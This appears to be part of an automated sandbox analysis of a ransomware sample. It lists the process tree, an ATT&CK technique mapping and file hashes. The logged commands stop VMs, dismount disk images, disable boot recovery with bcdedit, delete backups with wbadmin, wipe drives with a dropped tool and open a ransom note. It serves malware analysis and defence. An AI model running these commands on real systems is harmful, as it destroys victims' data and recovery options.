C:\Windows\system32\powercfg.exepowercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 04⤵
- Power Settings
PID:2640
-
-
C:\Windows\system32\powercfg.exepowercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 04⤵
- Power Settings
PID:2144
-
-
C:\Windows\system32\powercfg.exepowercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 04⤵
- Power Settings
PID:2208
-
-
C:\Windows\system32\powercfg.exepowercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 04⤵
- Power Settings
PID:1308
-
-
C:\Windows\system32\powercfg.exepowercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 04⤵
- Power Settings
PID:1004
-
-
C:\Windows\system32\powercfg.exepowercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 04⤵
- Power Settings
PID:3020
-
-
C:\Windows\system32\powercfg.exepowercfg.exe -S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c4⤵
- Power Settings
PID:1380
-
-
C:\Windows\system32\powercfg.exepowercfg.exe -S e9a42b02-d5df-448d-aa00-03f14749eb614⤵
- Power Settings
PID:1184
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass "Get-VM | Stop-VM"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass "Get-VM | Select-Object vmid | Get-VHD | %{Get-DiskImage -ImagePath $_.Path; Get-DiskImage -ImagePath $_.ParentPath} | Dismount-DiskImage"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass "Get-Volume | Get-DiskImage | Dismount-DiskImage"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1736
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
PID:840
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no4⤵
- Modifies boot configuration data using bcdedit
PID:1788
-
-
C:\Windows\system32\wbadmin.exewbadmin.exe DELETE SYSTEMSTATEBACKUP4⤵
- Deletes System State backups
- Drops file in Windows directory
PID:1176
-
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet4⤵
- Deletes backup catalog
PID:2104
-
-
C:\Users\Admin\AppData\Local\BFBF5FF3-02FF-66A7-72D2-688544C61A80\Everything.exe"C:\Users\Admin\AppData\Local\BFBF5FF3-02FF-66A7-72D2-688544C61A80\Everything.exe" -startup4⤵
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1876
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AllowMultipleTSSessions" /t REG_DWORD /d 0x1 /f4⤵
- System Location Discovery: System Language Discovery
PID:2056
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fSingleSessionPerUser" /t REG_DWORD /d 0x0 /f4⤵
- System Location Discovery: System Language Discovery
PID:784
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe "C:\Users\Admin\AppData\Local\README_SOLVETHIS.txt"4⤵
- System Location Discovery: System Language Discovery
- Opens file in notepad (likely ransom note)
PID:1784
-
-
C:\Users\Admin\AppData\Local\BFBF5FF3-02FF-66A7-72D2-688544C61A80\xdel.exe"C:\Users\Admin\AppData\Local\BFBF5FF3-02FF-66A7-72D2-688544C61A80\xdel.exe" -accepteula -p 1 -c C:\4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2356
-
-
C:\Users\Admin\AppData\Local\BFBF5FF3-02FF-66A7-72D2-688544C61A80\xdel.exe"C:\Users\Admin\AppData\Local\BFBF5FF3-02FF-66A7-72D2-688544C61A80\xdel.exe" -accepteula -p 1 -c F:\4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:212
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
PID:2836
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1600
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:348
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:2888
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1296
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2516
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
2Change Default File Association
1Image File Execution Options Injection
1Power Settings
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
2Change Default File Association
1Image File Execution Options Injection
1Defense Evasion
Impair Defenses
1Disable or Modify Tools
1Indicator Removal
2File Deletion
2Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9.2MB
MD5417284146c6f9d076fdba9ab76c8aa1f
SHA1e76bb2dbf6e362647acc2d0355766944d3682665
SHA25698e92491db56a7d14c70534a2602488108dd4c313d5ee5cbbe5bca31e79c4ea2
SHA51234d823b228638778c85501c06a9f635dc299a1801a4bf6cf99276e678be2367d95749e1e7783cc92decabd2246a8609ef742c3535299218ffcbb48cfd01ccf63
-
Filesize
20KB
MD5b3c5133a15a1b2b751b0fb3b56285de1
SHA1fa525b4e943a9303372a06a90f2922974dab6490
SHA2566f5f72e4fc66221679cc0b1882d2e85f8cdaf17b3e405b4aa26aee809fde9f9f
SHA512a806fa99f9cfdf330257fd8849e419c6bd09b5e663d4983ee33ef3879991763fb7f194a2218067cc74eb0ba9c6018e333e8c70e3dca74915024422da19fe11e2
-
Filesize
1KB
MD520d5a3d95ebdc1d6515922e8341223d9
SHA1f27cdf6a7ca229e5241e10879fd0101905371c6a
SHA256d8fcc8b56c4ae767860da9be280bfc5c756dc20d82846bbac9dded174f0b1dba
SHA512295d14838e57df8a016d7bdf41b997f3ebb53cf7965e5c2df8857d789f3d0819940be2278fc4cac6e4c19e053f9e4e06c66b3f55ca41e2874f7906e74924189b
-
Filesize
210B
MD5f48067c39b81ebcaef918ee1b2226e1a
SHA1092240ee6d1a37bb14dc330375862d7bfdfc28ff
SHA256c2966f06cb6a4a314d5ace764ac3949c83500c383ad260b0e9e3fd60da20092c
SHA512330e77cabb8221258490ee2ae969de5492564eb2f1e4907a555a1b4b40d3b7fef686c09e7c137f3179f793d0a316ab48b891e982b90e915ed6888217faf82f03
-
Filesize
802KB
MD5ac34ba84a5054cd701efad5dd14645c9
SHA1dc74a9fd5560b7c7a0fc9d183de9d676e92b9e8b
SHA256c576f7f55c4c0304b290b15e70a638b037df15c69577cd6263329c73416e490e
SHA512df491306a3c8ddb580b7cca1dce9e22a87fd43ca3632f3630cdcbe114bef243e847b2ce774d688f6e142516f2e0fc49d30fad7c7168e627523da21e2fe06836a
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe
Filesize2.3MB
MD536adf0930dee86c24335c023b9de1956
SHA1f7400c68d2a13c9ddad0adb1ace6b70ed9a47bd6
SHA256b3658008f5c35db1cc1c72fbf9587b8de23e5a3efd53186805deef84b09318d2
SHA51209eb1c90760c4b065880874318f3107a096820203854fff48dc8e26d330e3b483be1a84c3e5cd57a87345190f1d2c92349587b5628dbed1d2a8adde34fae040b
-
Filesize
1.7MB
MD5c44487ce1827ce26ac4699432d15b42a
SHA18434080fad778057a50607364fee8b481f0feef8
SHA2564c83e46a29106afbaf5279029d102b489d958781764289b61ab5b618a4307405
SHA512a0ea698333c21e59b5bc79d79ff39d185a019cede394dbd8b2eb72c4230001685a90098a691c296aeab27db6751eef56c4261cf00f790de2e9e9efc0e7f7c808
-
Filesize
548B
MD5742c2400f2de964d0cce4a8dabadd708
SHA1c452d8d4c3a82af4bc57ca8a76e4407aaf90deca
SHA2562fefb69e4b2310be5e09d329e8cf1bebd1f9e18884c8c2a38af8d7ea46bd5e01
SHA51263a7f1482dc15d558e1a26d1214fcecca14df6db78c88735a67d1a89185c05210edc38b38e3e014dac817df88968aaf47beb40e8298777fbb5308abfe16479e4
-
Filesize
550B
MD551014c0c06acdd80f9ae4469e7d30a9e
SHA1204e6a57c44242fad874377851b13099dfe60176
SHA25689ad2164717bd5f5f93fbb4cebf0efeb473097408fddfc7fc7b924d790514dc5
SHA51279b5e2727cce5cd9f6d2e886f93b22b72ec0ad4a6b9ad47205d7cf283606280665ead729ab3921d7e84409cfc09a94e749a68918130f0172856626f5f7af010c
-
Filesize
1.6MB
MD5b5ccae67ddfb858b2f764cd6d4065e99
SHA1208bbca7a59bb1926e93c4986700a47c06fdd7b2
SHA256915a72236ead8270af5fdf315b1128bdd98eecae53dd82653748e456d8dc3c2b
SHA5128b4666a823f918396c2b36df22279ec20e949c3fc184058b5dd9425b49a9d3dcb1e1e901e995a13334df820931b981d00c102dbad276f3fb870312fb0aac5427
-
Filesize
350KB
MD5803df907d936e08fbbd06020c411be93
SHA14aa4b498ae037a2b0479659374a5c3af5f6b8d97
SHA256e8eaa39e2adfd49ab69d7bb8504ccb82a902c8b48fbc256472f36f41775e594c
SHA5125b9c44b4ed68b632360c66b35442722d2797807c88555c9fde9c176581d410e4f6ed433fabdcd9ee614db458158e6055a9f7f526ebfbc8e7f5f3d388f5de4532
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UXPQ3BVA28TC5UL0VJDY.temp
Filesize7KB
MD54bec6030d2940c61cab3491871b6d1ec
SHA124e1704f2e894bfe2ac26bf057d636b3b293f00d
SHA256284d741a1a484626c67c4279cb0328c299d664dabf6cb51cc3421918ecebf7d8
SHA51232993d890b6d3552252662bc41fb8e8e147dcf6cd3bb776928837553b298def112df79fa501e558ce2417b2cc7f2f86a3a7a81d957cf76ce233e7f45939e0bd8
-
Filesize
233B
MD5cd4326a6fd01cd3ca77cfd8d0f53821b
SHA1a1030414d1f8e5d5a6e89d5a309921b8920856f9
SHA2561c59482111e657ef5190e22de6c047609a67e46e28d67fd70829882fd8087a9c
SHA51229ce5532fb3adf55caa011e53736507fbf241afee9d3ca516a1d9bffec6e5cb2f87c4cd73e4da8c33b8706f96ba3b31f13ce229746110d5bd248839f67ec6d67
-
Filesize
32B
MD50f400d1d7d8ac3f119121456e23b9596
SHA1365df39ea839de73265cbec0ae040144c6d7372a
SHA2568c397967a43dfc5b72d438bdd08e8168976194e339c1e9742da6b0844199a172
SHA512e9b1862cce2041df3c65d804147a270be5fd2e54be93d637956f796655be589baf9d724c04fa9e1993b1d78fb5852e76b8a84481bc80b6739bc63cde7414025d
-
Filesize
772KB
MD5b93eb0a48c91a53bda6a1a074a4b431e
SHA1ac693a14c697b1a8ee80318e260e817b8ee2aa86
SHA256ab15a9b27ee2d69a8bc8c8d1f5f40f28cd568f5cbb28d36ed938110203f8d142
SHA512732cb0dcb2b1dac1a7462554c256cec27de243734f79b7f87026e9f5fbae6d5d8a5f14a702d2af0b65897b6abad70a9eff1905dc851ce267d221ddcdd9e640c5
-
Filesize
84KB
MD53b03324537327811bbbaff4aafa4d75b
SHA11218bd8165a2e0ec56a88b5a8bb4b27e52b564e7
SHA2568cae8a9740d466e17f16481e68de9cbd58265863c3924d66596048edfd87e880
SHA512ba5312e1836bac0bb05b133b2b938be98b28646c8b8fc45804d7f252cd2e1a191667bfa8ba979bf2a07d49053114234b78cca83ef28aecf105d7169a3ec3dc62